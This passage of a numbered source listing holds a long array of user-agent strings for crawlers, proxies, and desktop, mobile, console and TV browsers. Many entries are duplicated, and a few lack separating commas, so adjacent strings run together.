  295. "TerrawizBot/1.0 (+http://www.terrawiz.com/bot.html)",
  296. "TheSuBot/0.2 (www.thesubot.de)",
  297. "TheSuBot/0.1 (www.thesubot.de)",
  298. "FAST-WebCrawler/3.8 (atw-crawler at fast dot no; http://fast.no/support/crawler.asp)",
  299. "FAST-WebCrawler/3.7/FirstPage (atw-crawler at fast dot no;http://fast.no/support/crawler.asp)",
  300. "FAST-WebCrawler/3.7 (atw-crawler at fast dot no; http://fast.no/support/crawler.asp)",
  301. "FAST-WebCrawler/3.6/FirstPage (atw-crawler at fast dot no;http://fast.no/support/crawler.asp)",
  302. "FAST-WebCrawler/3.6 (atw-crawler at fast dot no; http://fast.no/support/crawler.asp)",
  303. "FAST-WebCrawler/3.x Multimedia",
  304. "Mozilla/4.0 (compatible: FDSE robot)",
  305. "findlinks/2.0.1 (+http://wortschatz.uni-leipzig.de/findlinks/)",
  306. "findlinks/1.1.6-beta6 (+http://wortschatz.uni-leipzig.de/findlinks/)",
  307. "findlinks/1.1.6-beta4 (+http://wortschatz.uni-leipzig.de/findlinks/)",
  308. "findlinks/1.1.6-beta1 (+http://wortschatz.uni-leipzig.de/findlinks/)",
  309. "findlinks/1.1.5-beta7 (+http://wortschatz.uni-leipzig.de/findlinks/)",
  310. "Mozilla/5.0 (Windows; U; WinNT; en; rv:1.0.2) Gecko/20030311 Beonex/0.8.2-stable",
  311. "Mozilla/5.0 (Windows; U; WinNT; en; Preview) Gecko/20020603 Beonex/0.8-stable",
  312. "Mozilla/5.0 (X11; U; Linux i686; nl; rv:1.8.1b2) Gecko/20060821 BonEcho/2.0b2 (Debian-1.99+2.0b2+dfsg-1)",
  313. "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1b2) Gecko/20060821 BonEcho/2.0b2",
  314. "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1b2) Gecko/20060826 BonEcho/2.0b2",
  315. "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8.1b2) Gecko/20060831 BonEcho/2.0b2",
  316. "Mozilla/5.0 (X11; U; Linux x86_64; en-GB; rv:1.8.1b1) Gecko/20060601 BonEcho/2.0b1 (Ubuntu-edgy)",
  317. "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1a3) Gecko/20060526 BonEcho/2.0a3",
  318. "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.1a2) Gecko/20060512 BonEcho/2.0a2",
  319. "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1a2) Gecko/20060512 BonEcho/2.0a2",
  320. "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1a2) Gecko/20060512 BonEcho/2.0a2",
  321. "AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)",
  322. "AppEngine-Google; (+http://code.google.com/appengine; appid: unblock4myspace)"
  323. "AppEngine-Google; (+http://code.google.com/appengine; appid: tunisproxy)",
  324. "AppEngine-Google; (+http://code.google.com/appengine; appid: proxy-in-rs)",
  325. "AppEngine-Google; (+http://code.google.com/appengine; appid: proxy-ba-k)",
  326. "AppEngine-Google; (+http://code.google.com/appengine; appid: moelonepyaeshan)",
  327. "AppEngine-Google; (+http://code.google.com/appengine; appid: mirrorrr)",
  328. "AppEngine-Google; (+http://code.google.com/appengine; appid: mapremiereapplication)",
  329. "AppEngine-Google; (+http://code.google.com/appengine; appid: longbows-hideout)",
  330. "AppEngine-Google; (+http://code.google.com/appengine; appid: eduas23)",
  331. "AppEngine-Google; (+http://code.google.com/appengine; appid: craigserver)",
  332. "AppEngine-Google; ( http://code.google.com/appengine; appid: proxy-ba-k)",
  333. "magpie-crawler/1.1 (U; Linux amd64; en-GB; +http://www.brandwatch.net)",
  334. "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)",
  335. "Mozilla/5.0 (compatible; MJ12bot/v1.2.3; http://www.majestic12.co.uk/bot.php?+)",
  336. "MJ12bot/v1.0.8 (http://majestic12.co.uk/bot.php?+)",
  337. "MJ12bot/v1.0.7 (http://majestic12.co.uk/bot.php?+)",
  338. "Mozilla/5.0 (compatible; MojeekBot/2.0; http://www.mojeek.com/bot.html)",
  339. "MojeekBot/0.2 (archi; http://www.mojeek.com/bot.html)",
  340. "Moreoverbot/5.1 ( http://w.moreover.com; webmaster@moreover.com) Mozilla/5.0",
  341. "Moreoverbot/5.00 (+http://www.moreover.com; webmaster@moreover.com)",
  342. "msnbot/1.0 (+http://search.msn.com/msnbot.htm)",
  343. "msnbot/0.9 (+http://search.msn.com/msnbot.htm)",
  344. "msnbot/0.11 ( http://search.msn.com/msnbot.htm)",
  345. "MSNBOT/0.1 (http://search.msn.com/msnbot.htm)",
  346. "Mozilla/5.0 (compatible; mxbot/1.0; +http://www.chainn.com/mxbot.html)",
  347. "Mozilla/5.0 (compatible; mxbot/1.0; http://www.chainn.com/mxbot.html)",
  348. "NetResearchServer/4.0(loopimprovements.com/robot.html)",
  349. "NetResearchServer/3.5(loopimprovements.com/robot.html)",
  350. "NetResearchServer/2.8(loopimprovements.com/robot.html)",
  351. "NetResearchServer/2.7(loopimprovements.com/robot.html)",
  352. "NetResearchServer/2.5(loopimprovements.com/robot.html)",
  353. "Mozilla/5.0 (compatible; Baiduspider/2.0;+http://www.baidu.com/search/spider.html)",
  354. "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1)",
  355. "Mozilla/5.0+(compatible;+Baiduspider/2.0;++http://www.baidu.com/search/spider.html)",
  356. "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)",
  357. "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)",
  358. "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET ",
  359. "Googlebot/2.1 (http://www.googlebot.com/bot.html)",
  360. "Opera/9.20 (Windows NT 6.0; U; en)",
  361. "YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)",
  362. "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)",
  363. "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)",
  364. "Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0",
  365. "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)",
  366. "Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16",
  367. "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)",
  368. "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13",
  369. "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)",
  370. "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
  371. "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)",
  372. "Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)",
  373. "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.22 (KHTML, like Gecko) Chrome/25.0.1364.97 Safari/537.22 Perk/3.3.0.0",
  374. "Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)",
  375. "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8",
  376. "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7",
  377. "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
  378. "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)",
  379. "YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)",
  380. "Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51",
  381. "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6",
  382. "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0",
  383. "Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en; rv:1.8.1.11) Gecko/20071128 Camino/1.5.4",
  384. "Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201",
  385. "Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.6) Gecko/2009020911",
  386. "Mozilla/5.0 (Windows; U; Windows NT 6.1; cs; rv:1.9.2.6) Gecko/20100628 myibrow/4alpha2",
  387. "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; MyIE2; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0)",
  388. "Mozilla/5.0 (Windows; U; Win 9x 4.90; SG; rv:1.9.2.4) Gecko/20101104 Netscape/9.1.0285",
  389. "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko/20090327 Galeon/2.0.7",
  390. "Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Thunderbird/38.2.0 Lightning/4.0.2",
  391. "wii libnup/1.0",
  392. "PSP (PlayStation Portable); 2.00",
  393. "Bunjalloo/0.7.6(Nintendo DS;U;en)",
  394. "Doris/1.15 [en] (Symbian)",
  395. "BlackBerry7520/4.0.0 Profile/MIDP-2.0 Configuration/CLDC-1.1",
  396. "BlackBerry9700/5.0.0.743 Profile/MIDP-2.1 Configuration/CLDC-1.1 VendorID/100",
  397. "Opera/9.80 (X11; Linux i686; Ubuntu/14.10) Presto/2.12.388 Version/12.16",
  398. "Opera/9.80 (Windows NT 5.1; U;) Presto/2.7.62 Version/11.01",
  399. "Mozilla/5.0 (X11; Linux x86_64; U; de; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.62",
  400. "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36",
  401. "Mozilla/5.0 (Linux; Android 4.4.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.89 Mobile Safari/537.36",
  402. "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.39 Safari/525.19",
  403. "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; chromeframe/11.0.696.57)",
  404. "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; uZardWeb/1.0; Server_JP)",
  405. "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17 Skyfire/2.0",
  406. "SonyEricssonW800i/R1BD001/SEMC-Browser/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1",
  407. "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/4.0; FDM; MSIECrawler; Media Center PC 5.0)",
  408. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0) Gecko/20110517 Firefox/5.0 Fennec/5.0",
  409. "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; FunWebProducts)",
  410. "MOT-V300/0B.09.19R MIB/2.2 Profile/MIDP-2.0 Configuration/CLDC-1.0",
  411. "Mozilla/5.0 (Android; Linux armv7l; rv:9.0) Gecko/20111216 Firefox/9.0 Fennec/9.0",
  412. "Mozilla/5.0 (compatible; Teleca Q7; Brew 3.1.5; U; en) 480X800 LGE VX11000",
  413. "MOT-L7/08.B7.ACR MIB/2.2.1 Profile/MIDP-2.0 Configuration/CLDC-1.1"
  414. "Mozilla/4.0 (Compatible; MSIE 8.0; Windows NT 5.2; Trident/6.0)",
  415. "Mozilla/4.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0)",
  416. "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; pl) Opera 11.00",
  417. "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; en) Opera 11.00",
  418. "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; ja) Opera 11.00",
  419. "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; de) Opera 11.01",
  420. "Mozilla/5.0 (Windows NT 6.1; WOW64) SkypeUriPreview Preview/0.5",
  421. "Mozilla/5.0 (compatible; Konqueror/3.0; i686 Linux; 20021117)",
  422. "Mozilla/5.0 (Windows NT 6.1; WOW64) SkypeUriPreview Preview/0.5",
  423. "Mozilla/5.0 (iPhone; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10",
  424. "Mozilla/5.0 Galeon/1.0.3 (X11; Linux i686; U;) Gecko/0",
  425. "Opera/6.04 (Windows XP; U) [en]",
  426. "Opera/9.99 (X11; U; sk)",
  427. "Mozilla/6.0 (Future Star Technologies Corp. Star-Blade OS; U; en-US) iNet Browser 2.5",
  428. "Mozilla/5.0(iPad; U; CPU iPhone OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B314 Safari/531.21.10gin_lib.cc",
  429. "Mozilla/5.0 Galeon/1.2.9 (X11; Linux i686; U;) Gecko/20021213 Debian/1.2.9-0.bunk",
  430. "Mozilla/5.0 Slackware/13.37 (X11; U; Linux x86_64; en-US) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41",
  431. "Mozilla/5.0 (compatible; iCab 3.0.3; Macintosh; U; PPC Mac OS)",
  432. "Opera/9.80 (J2ME/MIDP; Opera Mini/5.0 (Windows; U; Windows NT 5.1; en) AppleWebKit/886; U; en) Presto/2.4.15"
  433. "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0",
  434. "Mozilla/5.0 (X11; U; Linux ppc; en-US; rv:1.9a8) Gecko/2007100620 GranParadiso/3.1",
  435. "Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)",
  436. "Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en; rv:1.8.1.11) Gecko/20071128 Camino/1.5.4",
  437. "Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201",
  438. "Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.6) Gecko/2009020911",
  439. "Mozilla/5.0 (Windows; U; Windows NT 6.1; cs; rv:1.9.2.6) Gecko/20100628 myibrow/4alpha2",
  440. "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; MyIE2; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0)",
  441. "Mozilla/5.0 (Windows; U; Win 9x 4.90; SG; rv:1.9.2.4) Gecko/20101104 Netscape/9.1.0285",
  442. "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko/20090327 Galeon/2.0.7",
  443. "Mozilla/5.0 (PLAYSTATION 3; 3.55)",
  444. "Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Thunderbird/38.2.0 Lightning/4.0.2",
  445. "wii libnup/1.0",
  446. "Mozilla/4.0 (PSP (PlayStation Portable); 2.00)",
  447. "PSP (PlayStation Portable); 2.00",
  448. "Gigabot/3.0 (http://www.gigablast.com/spider.html)",
  449. "Bunjalloo/0.7.6(Nintendo DS;U;en)",
  450. "LG-BDP Linux/2.6.35 UPnP/1.0 DLNADOC/1.50 LGE_DLNA_SDK/1.5.0",
  451. "Mozilla/5.0 (SmartHub; SMART-TV; U; Linux/SmartTV) AppleWebKit/531.2+ (KHTML, like Gecko) WebBrowser/1.0 SmartTV Safari/531.2+",
  452. "Mozilla/5.0 (SMART-TV; X11; Linux i686) AppleWebKit/535.20+ (KHTML, like Gecko) Version/5.0 Safari/535.20+",
  453. "Doris/1.15 [en] (Symbian)",
  454. "BlackBerry7520/4.0.0 Profile/MIDP-2.0 Configuration/CLDC-1.1",
  455. "BlackBerry9700/5.0.0.743 Profile/MIDP-2.1 Configuration/CLDC-1.1 VendorID/100",
  456. "Opera/9.80 (X11; Linux i686; Ubuntu/14.10) Presto/2.12.388 Version/12.16",
  457. "Opera/9.80 (Windows NT 5.1; U;) Presto/2.7.62 Version/11.01",
  458. "Mozilla/5.0 (X11; Linux x86_64; U; de; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.62",
  459. "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36",
  460. "Mozilla/5.0 (Linux; Android 4.4.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.89 Mobile Safari/537.36",
  461. "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.39 Safari/525.19",
  462. "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; chromeframe/11.0.696.57)",
  463. "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; uZardWeb/1.0; Server_JP)",
  464. "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17 Skyfire/2.0",
  465. "SonyEricssonW800i/R1BD001/SEMC-Browser/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1",
  466. "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/4.0; FDM; MSIECrawler; Media Center PC 5.0)",
  467. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0) Gecko/20110517 Firefox/5.0 Fennec/5.0",
  468. "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; FunWebProducts)",
  469. "MOT-V300/0B.09.19R MIB/2.2 Profile/MIDP-2.0 Configuration/CLDC-1.0",
  470. "Mozilla/5.0 (Android; Linux armv7l; rv:9.0) Gecko/20111216 Firefox/9.0 Fennec/9.0",
  471. "Mozilla/5.0 (compatible; Teleca Q7; Brew 3.1.5; U; en) 480X800 LGE VX11000",
  472. "MOT-L7/08.B7.ACR MIB/2.2.1 Profile/MIDP-2.0 Configuration/CLDC-1.1"
  473. "Mozilla/4.0 (Compatible; MSIE 8.0; Windows NT 5.2; Trident/6.0)",
  474. "Mozilla/4.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0)",
  475. "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; pl) Opera 11.00",
  476. "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; en) Opera 11.00",
  477. "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; ja) Opera 11.00",
  478. "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; de) Opera 11.01",
  479. "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; fr) Opera 11.00",
  480. "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36",
  481. "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36",
  482. "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0",
  483. "Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4",
  484. "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0",
  485. "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36",
  486. "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36",
  487. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11) AppleWebKit/601.1.56 (KHTML, like Gecko) Version/9.0 Safari/601.1.56",
  488. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/601.2.7 (KHTML, like Gecko) Version/9.0.1 Safari/601.2.7",
  489. "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko",
  490. "Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)",
  491. "Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51",
  492. "Opera/9.80 (X11; Linux i686; Ubuntu/14.10) Presto/2.12.388 Version/12.16",
  493. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A",
  494. "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36",
  495. "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36",
  496. "Mozilla/5.0 (Linux; Android 4.4.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.89 Mobile Safari/537.36",
  497. "Mozilla/5.0 (Linux; Android 4.4.3; HTC_0PCV2 Build/KTU84L) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36",
  498. "Mozilla/4.0 (compatible; MSIE 8.0; X11; Linux x86_64; pl) Opera 11.00",
  499. "Mozilla/4.0 (compatible; MSIE 9.0; Windows 98; .NET CLR 3.0.04506.30)",
  500. "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)",
  501. "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/4.0; GTB7.4; InfoPath.3; SV1; .NET CLR 3.4.53360; WOW64; en-US)",
  502. "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/4.0; FDM; MSIECrawler; Media Center PC 5.0)",
  503. "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 4.4.58799; WOW64; en-US)",
  504. "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; FunWebProducts)",
  505. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0",
  506. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:21.0) Gecko/20100101 Firefox/21.0",
  507. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:24.0) Gecko/20100101 Firefox/24.0",
  508. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko/20100101 Firefox/33.0"
  509. "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; fr) Opera 11.00",
  510. "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36",
  511. "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36",
  512. "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0",
  513. "Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4",
  514. "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0",
  515. "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36",
  516. "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36",
  517. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11) AppleWebKit/601.1.56 (KHTML, like Gecko) Version/9.0 Safari/601.1.56",
  518. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/601.2.7 (KHTML, like Gecko) Version/9.0.1 Safari/601.2.7",
  519. "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko",
  520. "Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)",
  521. "Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51",
  522. "Mozilla/5.0 (Windows NT 6.1; WOW64) SkypeUriPreview Preview/0.5",
  523. "Mozilla/5.0 (compatible; Konqueror/3.0; i686 Linux; 20021117)",
  524. "Mozilla/5.0 (Windows NT 6.1; WOW64) SkypeUriPreview Preview/0.5",
  525. "Mozilla/5.0 (iPhone; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10",
  526. "Mozilla/5.0 Galeon/1.0.3 (X11; Linux i686; U;) Gecko/0",
  527. "Opera/6.04 (Windows XP; U) [en]",
  528. "Opera/9.99 (X11; U; sk)",
  529. "Mozilla/6.0 (Future Star Technologies Corp. Star-Blade OS; U; en-US) iNet Browser 2.5",
  530. "Mozilla/5.0(iPad; U; CPU iPhone OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B314 Safari/531.21.10gin_lib.cc",
  531. "Mozilla/5.0 Galeon/1.2.9 (X11; Linux i686; U;) Gecko/20021213 Debian/1.2.9-0.bunk",
  532. "Mozilla/5.0 Slackware/13.37 (X11; U; Linux x86_64; en-US) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41",
  533. "Mozilla/5.0 (compatible; iCab 3.0.3; Macintosh; U; PPC Mac OS)",
  534. "Opera/9.80 (J2ME/MIDP; Opera Mini/5.0 (Windows; U; Windows NT 5.1; en) AppleWebKit/886; U; en) Presto/2.4.15"
  535. "Opera/9.80 (X11; Linux i686; Ubuntu/14.10) Presto/2.12.388 Version/12.16",
  536. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A",
  537. "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36",
  538. "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36",
  539. "Mozilla/5.0 (Linux; Android 4.4.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.89 Mobile Safari/537.36",
  540. "Mozilla/5.0 (Linux; Android 4.4.3; HTC_0PCV2 Build/KTU84L) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36",
  541. "Mozilla/4.0 (compatible; MSIE 8.0; X11; Linux x86_64; pl) Opera 11.00",
  542. "Mozilla/4.0 (compatible; MSIE 9.0; Windows 98; .NET CLR 3.0.04506.30)",
  543. "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)",
  544. "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/4.0; GTB7.4; InfoPath.3; SV1; .NET CLR 3.4.53360; WOW64; en-US)",
  545. "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/4.0; FDM; MSIECrawler; Media Center PC 5.0)",
  546. "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 4.4.58799; WOW64; en-US)",
  547. "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; FunWebProducts)",
  548. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0",
  549. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:21.0) Gecko/20100101 Firefox/21.0",
  550. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:24.0) Gecko/20100101 Firefox/24.0",
  551. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko/20100101 Firefox/33.0"
  552. "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101 Firefox/13.0.1",
